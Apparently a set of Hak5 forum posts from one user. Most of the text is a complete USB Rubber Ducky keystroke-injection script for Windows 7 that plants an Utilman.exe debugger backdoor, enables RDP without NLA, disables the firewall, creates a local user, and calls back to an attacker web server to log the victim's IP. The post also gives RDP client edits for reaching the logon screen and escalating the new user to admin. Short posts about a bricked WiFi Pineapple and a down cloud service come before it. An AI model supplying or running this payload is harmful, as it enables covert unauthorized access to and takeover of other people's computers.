RUdude

Hi, seem I've burned and then bricked my Pineapple Bad experience to share. Hardware problem? Here are following symptoms, Ethernet ports does not working at all or working in unknown way, I need to do couple of strange things to make it work from time to time, but seems controller burned via ESD. I am not sure if there was a static discharge to device but I do not see any other reason, as this worked before. I tried to configure eth0 and eth1 adapter out of brigde, the same problem. Also according to wireshark (I've connected Pineapple to PC directly) seems RX line of Pineapple is not working , dmesg says something about this. Firmware change not helps. Here are some output: Message "br-lan: received packet on eth0 with own address as source address" repeats all time white eth0 is up. When issued 'ifconfig eth0 down' seems Pineapple working (was working.. oh..) About brick now :) And after this I commented lan interface configuration within /etc/config/network file to make device working only via Wireless and 3G, but I commented IP address also, stupid mistake I forgot I have no console, too hurry.. Any comments please? Already ordered USB-UART and seems will order new Pineapple or AP121U. Earlier there was NOT such a problem, ethernet was working flawlessly, it happened unexpectedly.

Sebkinne, thank you a lot!

Hi guys, http://cloud.wifipineapple.com is not working, I wonder if someone will be so kind and fix this. Thanks!

Anyway victim should be, it does not depend on Rubber Ducky, as this is only HID device like keyboard. If current user does not have admin privileges (not included in Administrators group) you will never run any program with administrator rights, as administator password will be requested (MENU -> DOWN -> DOWN -> ENTER -> LEFT -> ENTER)

Hi there, just want to share some experience of different locales workaround when using exploits like utilman https://github.com/h...utilman-exploit and creating local user with administrator rights. The main problem that current firmware does not support russian language (and many others), so it is impossible to change file ownership or add newly created user to admins group, as for example in localized windows version Administrators group name also localized (_Administratory_) (unfortunately this forum not accept RU chars and I can use russian word here) , so commands like these will never works STRING icacls "%systemroot%\System32\Utilman.exe" /grant _Administratory_:F /T[/CODE] [CODE]STRING net localgroup _Administratory_ Local000 /add[/CODE] Post of [b]PCFreak[/b] is amazing http://forums.hak5.o...ouching-a-file/ and this helped me a lot to make such workaround. As there is very restricted time while injecting victim computer, especially if you wil not have physical access to this PC later, here is using also Terminal Services for getting full access. Idea to add local user with restricted righs + utilman hack 'by PCFreak', and then remotely run cmd.exe using "Ease of Access"-button at the logon screen and promote to Admins. After inject script make HTTP request for specified server using powershell, so you may easy find its IP address in webserver logfile. Sure this will work only for real IP addresses, but not with fake or NAT. Windows 7 example, ANY localization, but default keyboard input locale should be US-English anyway, unfortunately. So before injecting try to check or change this. I do not know workaround here, let's discover together? [CODE] DELAY 3000 CONTROL ESCAPE DELAY 1000 STRING cmd DELAY 1000 MENU DELAY 1000 DOWN DELAY 200 DOWN DELAY 200 ENTER DELAY 1000 LEFT DELAY 200 ENTER DELAY 200 ENTER STRING REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe" /v Debugger /d cmd.exe /f ENTER DELAY 200 STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f ENTER DELAY 200 STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v TSUserEnabled /t REG_DWORD /d 1 /f ENTER DELAY 200 STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f ENTER DELAY 200 STRING netsh firewall set opmode disable ENTER DELAY 200 STRING net user Local000 /add ENTER DELAY 200 STRING net user Local000 * ENTER DELAY 200 STRING password ENTER DELAY 200 STRING password ENTER DELAY 200 STRING powershell (new-object System.Net.WebClient).DownloadFile('http://_server_IP_address/injected_host.html','%TEMP%\~tmp932.txt'); ENTER DELAY 200 STRING exit ENTER [/CODE] This script also enables Terminal Services with old clients compartibility (without NLA) mode and disables Windows Firewall. For connection to remote logon screen from NLA-enabled MSTSC clients like in Windows 7 you also need some client side modification, otherwise username and password will be requested before connection to server and you never will be able to see Logon screen and will not be able to use EoA-button. To resolve this issue you need to save empty RDP file and edit this using any editor like notepad.exe, these params should be changed/added: [CODE] authentication level:i:0 enablecredsspsupport:i:0 [/CODE] After this modification save file and connect to server, you will go directly to Logon screen. Give admin rights to your new user and after this you'll be able to login remotely (and locally, sure) --- BTW, another locale problem that fast keys (underlined chars in menu items) in Start menu or Right-button menu are also localized, for this reason I am not using these like [CODE]MENU STRING a[/CODE] instead of this I am select menu item using cursor keys [CODE] MENU DELAY 1000 DOWN DELAY 200 DOWN DELAY 200 ENTER [/CODE] I hope it will be helpful for someone. PS: this script will also work within Terminal Services session, so you will be able also inject remote PC using local USB port, usually it is connected to session on remote side (only fullscreen mode). Regards from Russia :)

Russian please :)